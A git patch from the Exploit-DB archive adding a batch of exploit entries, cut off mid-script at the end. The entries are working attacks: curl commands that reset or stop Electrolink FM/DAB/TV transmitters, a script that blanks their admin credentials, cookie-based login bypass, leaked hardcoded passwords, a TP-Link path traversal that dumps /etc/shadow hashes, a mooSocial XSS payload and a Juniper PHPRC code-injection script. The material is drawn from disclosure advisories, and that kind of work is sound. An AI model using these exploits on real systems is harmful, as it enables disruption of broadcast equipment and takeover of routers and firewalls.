From 81ae91fdae912a30b4448d35434d4ebfd4ac5b1a Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Sat, 3 Feb 2024 00:16:34 +0000 Subject: [PATCH] DB: 2024-02-03 14 changes to exploits/shellcodes/ghdb Electrolink FM/DAB/TV Transmitter - Unauthenticated Remote DoS Electrolink FM/DAB/TV Transmitter (controlloLogin.js) - Credentials Disclosure Electrolink FM/DAB/TV Transmitter (Login Cookie) - Authentication Bypass Electrolink FM/DAB/TV Transmitter (login.htm/mail.htm) - Credentials Disclosure Electrolink FM/DAB/TV Transmitter - Pre-Auth MPFS Image Remote Code Execution Electrolink FM/DAB/TV Transmitter - Remote Authentication Removal TP-LINK TL-WR740N - Multiple HTML Injection TP-Link TL-WR740N - UnAuthenticated Directory Transversal Juniper-SRX-Firewalls&EX-switches - (PreAuth-RCE) (PoC) mooSocial 3.1.8 - Cross-Site Scripting (XSS) on User Login Page PCMan FTP Server 2.0 - 'pwd' Remote Buffer Overflow WebCatalog 48.4 - Arbitrary Protocol Execution --- exploits/hardware/dos/51774.txt | 82 ++++++++++++++++ exploits/hardware/webapps/51768.txt | 56 +++++++++++ exploits/hardware/webapps/51769.txt | 18 ++++ exploits/hardware/webapps/51770.txt | 83 ++++++++++++++++ exploits/hardware/webapps/51771.txt | 90 +++++++++++++++++ exploits/hardware/webapps/51772.txt | 77 +++++++++++++++ exploits/hardware/webapps/51773.py | 115 ++++++++++++++++++++++ exploits/hardware/webapps/51775.txt | 146 ++++++++++++++++++++++++++++ exploits/php/webapps/51766.txt | 31 ++++++ exploits/php/webapps/51776.py | 76 +++++++++++++++ exploits/windows/remote/51765.txt | 40 ++++++++ exploits/windows/remote/51767.py | 65 +++++++++++++ files_exploits.csv | 12 +++ ghdb.xml | 54 ++++++++++ 14 files changed, 945 insertions(+) create mode 100644 exploits/hardware/dos/51774.txt create mode 100644 exploits/hardware/webapps/51768.txt create mode 100644 exploits/hardware/webapps/51769.txt create mode 100644 exploits/hardware/webapps/51770.txt create mode 100644 exploits/hardware/webapps/51771.txt create mode 100644 exploits/hardware/webapps/51772.txt create mode 100755 exploits/hardware/webapps/51773.py create mode 100644 exploits/hardware/webapps/51775.txt create mode 100644 exploits/php/webapps/51766.txt create mode 100755 exploits/php/webapps/51776.py create mode 100644 exploits/windows/remote/51765.txt create mode 100755 exploits/windows/remote/51767.py diff --git a/exploits/hardware/dos/51774.txt b/exploits/hardware/dos/51774.txt new file mode 100644 index 0000000000..e05e7f8663 --- /dev/null +++ b/exploits/hardware/dos/51774.txt @@ -0,0 +1,82 @@ +Electrolink FM/DAB/TV Transmitter Unauthenticated Remote DoS + + +Vendor: Electrolink s.r.l. +Product web page: https://www.electrolink.com +Affected version: 10W, 100W, 250W, Compact DAB Transmitter + 500W, 1kW, 2kW Medium DAB Transmitter + 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter + 100W, 500W, 1kW, 2kW Compact FM Transmitter + 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter + 15W - 40kW Digital FM Transmitter + BI, BIII VHF TV Transmitter + 10W - 5kW UHF TV Transmitter + Web version: 01.09, 01.08, 01.07 + Display version: 1.4, 1.2 + Control unit version: 01.06, 01.04, 01.03 + Firmware version: 2.1 + +Summary: Since 1990 Electrolink has been dealing with design and +manufacturing of advanced technologies for radio and television +broadcasting. The most comprehensive products range includes: FM +Transmitters, DAB Transmitters, TV Transmitters for analogue and +digital multistandard operation, Bandpass Filters (FM, DAB, ATV, +DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial +switches, Manual patch panels, RF power meters, Rigid line and +accessories. A professional solution that meets broadcasters needs +from small community television or radio to big government networks. + +Compact DAB Transmitters 10W, 100W and 250W models with 3.5" +touch-screen display and in-built state of the art DAB modulator, +EDI input and GPS receiver. All transmitters are equipped with a +state-of-the art DAB modulator with excellent performances, +self-protected and self-controlled amplifiers ensure trouble-free +non-stop operation. + +100W, 500W, 1kW and 2kW power range available on compact 2U and +3U 19" frame. Built-in stereo coder, touch screen display and +efficient low noise air cooling system. Available models: 3kW, +5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters +with fully broadband solid state amplifiers and an efficient +low-noise air cooling system. + +FM digital modulator with excellent specifications, built-in +stereo and RDS coder. Digital deviation limiter together with +ASI and SDI inputs are available. These transmitters are ready +for ISOFREQUENCY networks. + +Available for VHF BI and VHF BIII operation with robust desing +and user-friendly local and remote control. Multi-standard UHF +TV transmitters from 10W up to 5kW with efficient low noise air +cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC +and ISDB-Tb available. + +Desc: The transmitter is suffering from a Denial of Service (DoS) +scenario. An unauthenticated attacker can reset the board as well +as stop the transmitter operations by sending one GET request to +the command.cgi gateway. + +Tested on: Mbedthis-Appweb/12.5.0 + Mbedthis-Appweb/12.0.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +Macedonian Information Security Research & Development Laboratory +Zero Science Lab - https://www.zeroscience.mk - @zeroscience + + +Advisory ID: ZSL-2023-5795 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5795.php + + +30.06.2023 + +-- + + +C:\>curl -s http://192.168.150.77:8888/command.cgi?web=r (reset board) +Success! OK +C:\>curl -s http://192.168.150.77:8888/command.cgi?web=K (stop) +Success! OK +C:\>curl -s http://192.168.150.77:8888/command.cgi?web=J (start) +Success! OK \ No newline at end of file diff --git a/exploits/hardware/webapps/51768.txt b/exploits/hardware/webapps/51768.txt new file mode 100644 index 0000000000..7f1addd1d8 --- /dev/null +++ b/exploits/hardware/webapps/51768.txt @@ -0,0 +1,56 @@ +# Exploit Title: TP-Link TL-WR740N UnAuthenticated Directory Transversal +# Date: 25/9/2023 +# Exploit Author: Syed Affan Ahmed (ZEROXINN) +# Vendor Homepage: http://www.tp-link.com +# Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n +# Tested on: TP-Link TL-WR740N + +---------------------------POC--------------------------- + +Request +------- + +GET /help/../../../etc/shadow HTTP/1.1 +Host: 192.168.0.1:8082 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: ipaddr=192.168.0.100; mLangage=žée; exception=4 +Connection: close + +Response +-------- + +HTTP/1.1 200 OK +Server: Router Webserver +Connection: close +WWW-Authenticate: Basic realm="TP-LINK Wireless Lite N Router WR740N" +Content-Type: text/html + + + +TL-WR740N + + + + +root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7::: +Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7::: +bin::10933:0:99999:7::: +daemon::10933:0:99999:7::: +adm::10933:0:99999:7::: +lp:*:10933:0:99999:7::: +sync:*:10933:0:99999:7::: +shutdown:*:10933:0:99999:7::: +halt:*:10933:0:99999:7::: +uucp:*:10933:0:99999:7::: +operator:*:10933:0:99999:7::: +nobody::10933:0:99999:7::: +ap71::10933:0:99999:7::: \ No newline at end of file diff --git a/exploits/hardware/webapps/51769.txt b/exploits/hardware/webapps/51769.txt new file mode 100644 index 0000000000..befec3adb1 --- /dev/null +++ b/exploits/hardware/webapps/51769.txt @@ -0,0 +1,18 @@ +# Exploit Title: TP-LINK TL-WR740N - Multiple HTML Injection Vulnerabilities +# Date: 25/9/2023 +# Exploit Author: Shujaat Amin (ZEROXINN) +# Vendor Homepage: http://www.tp-link.com +# Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n +# Tested on: Windows 10 + +---------------------------POC----------------------------- + +1) Go to your routers IP (192.168.0.1) + +2) Go to Access control --> Target,rule + +3) Click on add new + +5) Type

Hello

in Target Description box + +6) Click on Save, and now you can see html injection on the webpage \ No newline at end of file diff --git a/exploits/hardware/webapps/51770.txt b/exploits/hardware/webapps/51770.txt new file mode 100644 index 0000000000..6e1a5ac32c --- /dev/null +++ b/exploits/hardware/webapps/51770.txt @@ -0,0 +1,83 @@ +Electrolink FM/DAB/TV Transmitter (login.htm/mail.htm) Credentials Disclosure + + +Vendor: Electrolink s.r.l. +Product web page: https://www.electrolink.com +Affected version: 10W, 100W, 250W, Compact DAB Transmitter + 500W, 1kW, 2kW Medium DAB Transmitter + 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter + 100W, 500W, 1kW, 2kW Compact FM Transmitter + 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter + 15W - 40kW Digital FM Transmitter + BI, BIII VHF TV Transmitter + 10W - 5kW UHF TV Transmitter + Web version: 01.09, 01.08, 01.07 + Display version: 1.4, 1.2 + Control unit version: 01.06, 01.04, 01.03 + Firmware version: 2.1 + +Summary: Since 1990 Electrolink has been dealing with design and +manufacturing of advanced technologies for radio and television +broadcasting. The most comprehensive products range includes: FM +Transmitters, DAB Transmitters, TV Transmitters for analogue and +digital multistandard operation, Bandpass Filters (FM, DAB, ATV, +DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial +switches, Manual patch panels, RF power meters, Rigid line and +accessories. A professional solution that meets broadcasters needs +from small community television or radio to big government networks. + +Compact DAB Transmitters 10W, 100W and 250W models with 3.5" +touch-screen display and in-built state of the art DAB modulator, +EDI input and GPS receiver. All transmitters are equipped with a +state-of-the art DAB modulator with excellent performances, +self-protected and self-controlled amplifiers ensure trouble-free +non-stop operation. + +100W, 500W, 1kW and 2kW power range available on compact 2U and +3U 19" frame. Built-in stereo coder, touch screen display and +efficient low noise air cooling system. Available models: 3kW, +5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters +with fully broadband solid state amplifiers and an efficient +low-noise air cooling system. + +FM digital modulator with excellent specifications, built-in +stereo and RDS coder. Digital deviation limiter together with +ASI and SDI inputs are available. These transmitters are ready +for ISOFREQUENCY networks. + +Available for VHF BI and VHF BIII operation with robust desing +and user-friendly local and remote control. Multi-standard UHF +TV transmitters from 10W up to 5kW with efficient low noise air +cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC +and ISDB-Tb available. + +Desc: The device is vulnerable to a disclosure of clear-text +credentials in login.htm and mail.htm that can allow security +bypass and system access. + +Tested on: Mbedthis-Appweb/12.5.0 + Mbedthis-Appweb/12.0.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +Macedonian Information Security Research & Development Laboratory +Zero Science Lab - https://www.zeroscience.mk - @zeroscience + + +Advisory ID: ZSL-2023-XXXX +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-xxxx.php + + +30.06.2023 + +-- + + +C:\>curl -s "http://192.168.150.77:8888/login.htm" | findstr /spina:d "passw" +55:Admin password +56: +63:Guest password +64: +C:\>curl -s http://192.168.150.77:8888/mail.htm | findstr /spina:d "passw" +93:Server password +94: \ No newline at end of file diff --git a/exploits/hardware/webapps/51771.txt b/exploits/hardware/webapps/51771.txt new file mode 100644 index 0000000000..465862a571 --- /dev/null +++ b/exploits/hardware/webapps/51771.txt @@ -0,0 +1,90 @@ +Electrolink FM/DAB/TV Transmitter (controlloLogin.js) Credentials Disclosure + + +Vendor: Electrolink s.r.l. +Product web page: https://www.electrolink.com +Affected version: 10W, 100W, 250W, Compact DAB Transmitter + 500W, 1kW, 2kW Medium DAB Transmitter + 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter + 100W, 500W, 1kW, 2kW Compact FM Transmitter + 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter + 15W - 40kW Digital FM Transmitter + BI, BIII VHF TV Transmitter + 10W - 5kW UHF TV Transmitter + Web version: 01.09, 01.08, 01.07 + Display version: 1.4, 1.2 + Control unit version: 01.06, 01.04, 01.03 + Firmware version: 2.1 + +Summary: Since 1990 Electrolink has been dealing with design and +manufacturing of advanced technologies for radio and television +broadcasting. The most comprehensive products range includes: FM +Transmitters, DAB Transmitters, TV Transmitters for analogue and +digital multistandard operation, Bandpass Filters (FM, DAB, ATV, +DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial +switches, Manual patch panels, RF power meters, Rigid line and +accessories. A professional solution that meets broadcasters needs +from small community television or radio to big government networks. + +Compact DAB Transmitters 10W, 100W and 250W models with 3.5" +touch-screen display and in-built state of the art DAB modulator, +EDI input and GPS receiver. All transmitters are equipped with a +state-of-the art DAB modulator with excellent performances, +self-protected and self-controlled amplifiers ensure trouble-free +non-stop operation. + +100W, 500W, 1kW and 2kW power range available on compact 2U and +3U 19" frame. Built-in stereo coder, touch screen display and +efficient low noise air cooling system. Available models: 3kW, +5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters +with fully broadband solid state amplifiers and an efficient +low-noise air cooling system. + +FM digital modulator with excellent specifications, built-in +stereo and RDS coder. Digital deviation limiter together with +ASI and SDI inputs are available. These transmitters are ready +for ISOFREQUENCY networks. + +Available for VHF BI and VHF BIII operation with robust desing +and user-friendly local and remote control. Multi-standard UHF +TV transmitters from 10W up to 5kW with efficient low noise air +cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC +and ISDB-Tb available. + +Desc: The device is vulnerable to a disclosure of clear-text +credentials in controlloLogin.js that can allow security +bypass and system access. + +Tested on: Mbedthis-Appweb/12.5.0 + Mbedthis-Appweb/12.0.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +Macedonian Information Security Research & Development Laboratory +Zero Science Lab - https://www.zeroscience.mk - @zeroscience + + +Advisory ID: ZSL-2023-5790 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5790.php + + +30.06.2023 + +-- + + +C:\>curl -s "http://192.168.150.77:8888/controlloLogin.js" +function verifica() { + var user = document.getElementById('user').value; + var password = document.getElementById('password').value; + + //alert(user); + + if(user=='admin' && password=='cozzir'){ + SetCookie('Login','OK',exp); + window.location.replace("FrameSetCore.html"); + }else{ + SetCookie('Login','NO',exp); + window.location.replace("login.html"); + } +} \ No newline at end of file diff --git a/exploits/hardware/webapps/51772.txt b/exploits/hardware/webapps/51772.txt new file mode 100644 index 0000000000..02b4aea98f --- /dev/null +++ b/exploits/hardware/webapps/51772.txt @@ -0,0 +1,77 @@ +Electrolink FM/DAB/TV Transmitter (Login Cookie) Authentication Bypass + + +Vendor: Electrolink s.r.l. +Product web page: https://www.electrolink.com +Affected version: 10W, 100W, 250W, Compact DAB Transmitter + 500W, 1kW, 2kW Medium DAB Transmitter + 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter + 100W, 500W, 1kW, 2kW Compact FM Transmitter + 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter + 15W - 40kW Digital FM Transmitter + BI, BIII VHF TV Transmitter + 10W - 5kW UHF TV Transmitter + Web version: 01.09, 01.08, 01.07 + Display version: 1.4, 1.2 + Control unit version: 01.06, 01.04, 01.03 + Firmware version: 2.1 + +Summary: Since 1990 Electrolink has been dealing with design and +manufacturing of advanced technologies for radio and television +broadcasting. The most comprehensive products range includes: FM +Transmitters, DAB Transmitters, TV Transmitters for analogue and +digital multistandard operation, Bandpass Filters (FM, DAB, ATV, +DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial +switches, Manual patch panels, RF power meters, Rigid line and +accessories. A professional solution that meets broadcasters needs +from small community television or radio to big government networks. + +Compact DAB Transmitters 10W, 100W and 250W models with 3.5" +touch-screen display and in-built state of the art DAB modulator, +EDI input and GPS receiver. All transmitters are equipped with a +state-of-the art DAB modulator with excellent performances, +self-protected and self-controlled amplifiers ensure trouble-free +non-stop operation. + +100W, 500W, 1kW and 2kW power range available on compact 2U and +3U 19" frame. Built-in stereo coder, touch screen display and +efficient low noise air cooling system. Available models: 3kW, +5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters +with fully broadband solid state amplifiers and an efficient +low-noise air cooling system. + +FM digital modulator with excellent specifications, built-in +stereo and RDS coder. Digital deviation limiter together with +ASI and SDI inputs are available. These transmitters are ready +for ISOFREQUENCY networks. + +Available for VHF BI and VHF BIII operation with robust desing +and user-friendly local and remote control. Multi-standard UHF +TV transmitters from 10W up to 5kW with efficient low noise air +cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC +and ISDB-Tb available. + +Desc: The transmitter is vulnerable to an authentication bypass +vulnerability affecting the Login Cookie. An attacker can set +an arbitrary value except 'NO' to the Login Cookie and have +full system access. + +Tested on: Mbedthis-Appweb/12.5.0 + Mbedthis-Appweb/12.0.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +Macedonian Information Security Research & Development Laboratory +Zero Science Lab - https://www.zeroscience.mk - @zeroscience + + +Advisory ID: ZSL-2023-5791 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5791.php + + +30.06.2023 + +-- + + +C:\>curl -s "http://192.168.150.77:8888/home.htm" -H "Cookie: Login=ADMIN" \ No newline at end of file diff --git a/exploits/hardware/webapps/51773.py b/exploits/hardware/webapps/51773.py new file mode 100755 index 0000000000..4ae59ecac4 --- /dev/null +++ b/exploits/hardware/webapps/51773.py @@ -0,0 +1,115 @@ +#!/usr/bin/env python +# +# +# Electrolink FM/DAB/TV Transmitter Remote Authentication Removal +# +# +# Vendor: Electrolink s.r.l. +# Product web page: https://www.electrolink.com +# Affected version: 10W, 100W, 250W, Compact DAB Transmitter +# 500W, 1kW, 2kW Medium DAB Transmitter +# 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter +# 100W, 500W, 1kW, 2kW Compact FM Transmitter +# 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter +# 15W - 40kW Digital FM Transmitter +# BI, BIII VHF TV Transmitter +# 10W - 5kW UHF TV Transmitter +# Web version: 01.09, 01.08, 01.07 +# Display version: 1.4, 1.2 +# Control unit version: 01.06, 01.04, 01.03 +# Firmware version: 2.1 +# +# Summary: Since 1990 Electrolink has been dealing with design and +# manufacturing of advanced technologies for radio and television +# broadcasting. The most comprehensive products range includes: FM +# Transmitters, DAB Transmitters, TV Transmitters for analogue and +# digital multistandard operation, Bandpass Filters (FM, DAB, ATV, +# DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial +# switches, Manual patch panels, RF power meters, Rigid line and +# accessories. A professional solution that meets broadcasters needs +# from small community television or radio to big government networks. +# +# Compact DAB Transmitters 10W, 100W and 250W models with 3.5" +# touch-screen display and in-built state of the art DAB modulator, +# EDI input and GPS receiver. All transmitters are equipped with a +# state-of-the art DAB modulator with excellent performances, +# self-protected and self-controlled amplifiers ensure trouble-free +# non-stop operation. +# +# 100W, 500W, 1kW and 2kW power range available on compact 2U and +# 3U 19" frame. Built-in stereo coder, touch screen display and +# efficient low noise air cooling system. Available models: 3kW, +# 5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters +# with fully broadband solid state amplifiers and an efficient +# low-noise air cooling system. +# +# FM digital modulator with excellent specifications, built-in +# stereo and RDS coder. Digital deviation limiter together with +# ASI and SDI inputs are available. These transmitters are ready +# for ISOFREQUENCY networks. +# +# Available for VHF BI and VHF BIII operation with robust desing +# and user-friendly local and remote control. Multi-standard UHF +# TV transmitters from 10W up to 5kW with efficient low noise air +# cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC +# and ISDB-Tb available. +# +# Desc: The application is vulnerable to an unauthenticated +# parameter manipulation that allows an attacker to set the +# credentials to blank giving her access to the admin panel. +# Also vulnerable to account takeover and arbitrary password +# change. +# +# Tested on: Mbedthis-Appweb/12.5.0 +# Mbedthis-Appweb/12.0.0 +# +# +# Vulnerability discovered by Neurogenesia +# Macedonian Information Security Research & Development Laboratory +# Zero Science Lab - https://www.zeroscience.mk - @zeroscience +# +# +# Advisory ID: ZSL-2023-5792 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5792.php +# +# +# 30.06.2023 +# +# + + +import datetime +import requests + +dt = datetime.datetime.now() +dt = dt.strftime('%d.%m.%Y %H:%M:%S') +nul = '' + +print('Starting transmitter exploit at', dt) + +ip = input('Enter transmitter ip: ') +if 'http' not in ip: + ip = 'http://' + ip + +ep = '/login.htm' +url = ip + ep + +signature = {'Accept-Encoding' : 'gzip, deflate', + 'Accept-Language' : 'ku-MK,en;q=0.1806', + 'User-Agent' : 'Broadcastso/B.B', + 'Connection' : 'keep-alive' + } +# ----------------- Line breaker v0.17 ----------------- +postd = { 'adminuser' : nul, + 'guestuser' : nul, + 'adminpassword' : nul, + 'guestpassword' : nul + } + +print('Removing security control...') +r = requests.post(url, data = postd, headers = signature) +if r.status_code == 200: + print('Done. Go and "Login".') +else: + print('Error') +exit(-4) \ No newline at end of file diff --git a/exploits/hardware/webapps/51775.txt b/exploits/hardware/webapps/51775.txt new file mode 100644 index 0000000000..863be7ba82 --- /dev/null +++ b/exploits/hardware/webapps/51775.txt @@ -0,0 +1,146 @@ +Electrolink FM/DAB/TV Transmitter Pre-Auth MPFS Image Remote Code Execution + + +Vendor: Electrolink s.r.l. +Product web page: https://www.electrolink.com +Affected version: 10W, 100W, 250W, Compact DAB Transmitter + 500W, 1kW, 2kW Medium DAB Transmitter + 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter + 100W, 500W, 1kW, 2kW Compact FM Transmitter + 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter + 15W - 40kW Digital FM Transmitter + BI, BIII VHF TV Transmitter + 10W - 5kW UHF TV Transmitter + Web version: 01.09, 01.08, 01.07 + Display version: 1.4, 1.2 + Control unit version: 01.06, 01.04, 01.03 + Firmware version: 2.1 + +Summary: Since 1990 Electrolink has been dealing with design and +manufacturing of advanced technologies for radio and television +broadcasting. The most comprehensive products range includes: FM +Transmitters, DAB Transmitters, TV Transmitters for analogue and +digital multistandard operation, Bandpass Filters (FM, DAB, ATV, +DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial +switches, Manual patch panels, RF power meters, Rigid line and +accessories. A professional solution that meets broadcasters needs +from small community television or radio to big government networks. + +Compact DAB Transmitters 10W, 100W and 250W models with 3.5" +touch-screen display and in-built state of the art DAB modulator, +EDI input and GPS receiver. All transmitters are equipped with a +state-of-the art DAB modulator with excellent performances, +self-protected and self-controlled amplifiers ensure trouble-free +non-stop operation. + +100W, 500W, 1kW and 2kW power range available on compact 2U and +3U 19" frame. Built-in stereo coder, touch screen display and +efficient low noise air cooling system. Available models: 3kW, +5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters +with fully broadband solid state amplifiers and an efficient +low-noise air cooling system. + +FM digital modulator with excellent specifications, built-in +stereo and RDS coder. Digital deviation limiter together with +ASI and SDI inputs are available. These transmitters are ready +for ISOFREQUENCY networks. + +Available for VHF BI and VHF BIII operation with robust desing +and user-friendly local and remote control. Multi-standard UHF +TV transmitters from 10W up to 5kW with efficient low noise air +cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC +and ISDB-Tb available. + +Desc: The device allows access to an unprotected endpoint that +allows MPFS File System binary image upload without authentication. +The MPFS2 file system module provides a light-weight read-only +file system that can be stored in external EEPROM, external +serial Flash, or internal Flash program memory. This file system +serves as the basis for the HTTP2 web server module, but is also +used by the SNMP module and is available to other applications +that require basic read-only storage capabilities. This can be +exploited to overwrite the flash program memory that holds the +web server's main interfaces and execute arbitrary code. + +Tested on: Mbedthis-Appweb/12.5.0 + Mbedthis-Appweb/12.0.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +Macedonian Information Security Research & Development Laboratory +Zero Science Lab - https://www.zeroscience.mk - @zeroscience + + +Advisory ID: ZSL-2023-5796 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5796.php + +Ref: https://documentation.help/Microchip-TCP.IP-Stack/GS-MPFSUpload.html + +30.06.2023 + +-- + + +POST /upload HTTP/1.1 +Host: 192.168.150.77:8888 +Content-Length: 251 +Cache-Control: max-age=0 +Content-Type: multipart/form-data; boundary=----joxypoxy +User-Agent: MPFS2_PoC/1.0c +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: Login=IgnoreMePlsKtnx +Connection: close + +------joxypoxy +Content-Disposition: form-data; name="i"; filename="MPFSimg.bin" +Content-Type: application/octet-stream + +MPFS... +-----joxypoxy-- + + +HTTP/1.1 200 OK +Connection: close +Content-Type: text/html + +MPFS Update Successful

Site main page + + +--- + +hd htm: +0d 0a 4d 50 46 53 02 01 01 00 8a 43 20 00 00 00 MPFS.......C.... +2b 00 00 00 30 00 00 00 02 44 eb 64 00 00 00 00 +...0....D.d.... +00 00 69 6e 64 65 78 32 2e 68 74 6d 00 3c 68 74 ..index0.htm...ZSL< +... +... +64 6f 73 21 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 2d dos!..</html>..- + +--- + +MPFS Structure: + [M][P][F][S] + [BYTE Ver Hi][BYTE Ver Lo][WORD Number of Files] + [Name Hash 0][Name Hash 1]...[Name Hash N] + [File Record 0][File Record 1]...[File Record N] + [String 0][String 1]...[String N] + [File Data 0][File Data 1]...[File Data N] + + +--- + +C:\>javaw -jar MPFS2.jar +C:\>mpfs2 -v -l MPFSimg.bin +Version: 2.1 +Number of files: 1 (1 regular, 0 index) +Number of dynamic variables: 0 + +FileRecord 0: + .StringPtr = 32 index0.htm + .DataPtr = 43 + .Len = 48 + .Timestamp = 2023-08-27T14:39:30Z + .Flags = 0 \ No newline at end of file diff --git a/exploits/php/webapps/51766.txt b/exploits/php/webapps/51766.txt new file mode 100644 index 0000000000..323dc02e7a --- /dev/null +++ b/exploits/php/webapps/51766.txt @@ -0,0 +1,31 @@ +# Exploit Title: mooSocial 3.1.8 - Cross-Site Scripting (XSS) on User Login Page +# Date: 26 September 2023 +# Exploit Author: Astik Rawat (ahrixia) +# Vendor Homepage: https://moosocial.com +# Software Link: https://travel.moosocial.com/ +# Version: 3.1.8 +# Tested on: Windows 11 +# CVE : CVE-2023-43325 + + +Description: + +A Cross Site Scripting (XSS) vulnerability exists on the user login page in mooSocial which is a social network website. + +Steps to exploit: +1) Go to Login page on the website and login with credentials. +2) Insert your payload in the "data[redirect_url]" - POST Request + Proof of concept (Poc): + The following payload will allow you to execute XSS - + + Payload (Plain text): + test"><img src=a onerror=alert(1)>test + + Payload (Base64 encoded) : + dGVzdCI+PGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q= + + Final Payload (Base64+Url encoded): + dGVzdCI%2bPGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q%3d%3d + + POST Request on /moosocial/users/login (POST REQUEST DATA ONLY): + [_method=POST&data%5Bredirect_url%5D=dGVzdCI%2bPGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q%3d%3d&data%5BUser%5D%5Bid%5D=&data%5BUser%5D%5Bemail%5D=admin%40localhost.com&data%5BUser%5D%5Bpassword%5D=pas[redacted]&data%5Bremember%5D=0] \ No newline at end of file diff --git a/exploits/php/webapps/51776.py b/exploits/php/webapps/51776.py new file mode 100755 index 0000000000..b8bd2e07ae --- /dev/null +++ b/exploits/php/webapps/51776.py @@ -0,0 +1,76 @@ +# *************************************************************************************************** +# Exploit Title: juniper-SRX-Firewalls&EX-switches (PreAuth-RCE) (PoC) +# Description: +# +# This code serves as both a vulnerability detector and a proof of concept for CVE-2023-36845. +# It executes the phpinfo() function on the login page of the target device, +# allowing to inspect the PHP configuration. also this script has the option to save the phpinfo() +# output to a file for further analysis. +# +# Shodan Dork: http.favicon.hash:2141724739 +# Date: 2023/10/01 +# Exploit Author: whiteOwl (whiteowl.pub@gmail.com) +# Vendor Homepage: https://whiteowl-pub.github.io +# Version: Versions Prior to 20.4R3-S9,21.1R1,21.2R3-S7,21.3R3-S5, +# 21.4R3-S5,22.1R3-S4,22.2R3-S2,22.3R2-S2/R3-S1,22. +# 4R2-S1/R3,23.2R1-S1/R2 +# Tested on: JUNOS SM804122pri 15.1X49-D170.4 +# CVE : cve-2023-36845 +# *************************************************************************************************** + +import argparse +import requests + +banner = """ +************************************************************* +* CVE-2023-36845 Vulnerability Detector & Proof of concept * +* This script checks for the CVE-2023-36845 vulnerability * +* and run phpinfo() on vulnerable devices. * +* If you suspect a vulnerable system, please take action * +* immediately to secure it. * +* * +* Author: whiteowl * +************************************************************* +""" + +def send_request(url, output_file=None, verbose=False): + target_url = f"{url}/?PHPRC=/dev/fd/0" + data = 'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="' + + headers = { + 'User-Agent': 'Mozilla/5.0', + } + + try: + response = requests.post(target_url, headers=headers, data=data, stream=True) + if response.status_code == 200: + print("The Target Device is Vulnerable to: CVE-2023-36845") + else: + print("Not Vulnerable: Status Code", response.status_code) + + if output_file: + with open(output_file, 'w', encoding='utf-8') as file: + file.write(response.text) + + if verbose: + print(f"HTTP Status Code: {response.status_code}") + print("Response Headers:") + for header, value in response.headers.items(): + print(f"{header}: {value}") + print("Response Content:") + print(response.text) + except requests.exceptions.RequestException as e: + print(f"An error occurred: {e}") + +def main(): + print(banner) + parser = argparse.ArgumentParser(description="Custom curl-like script") + parser.add_argument("-u", "--url", required=True, help="URL to send the HTTP request") + parser.add_argument("-o", "--output", help="Output file to save the HTML content") + 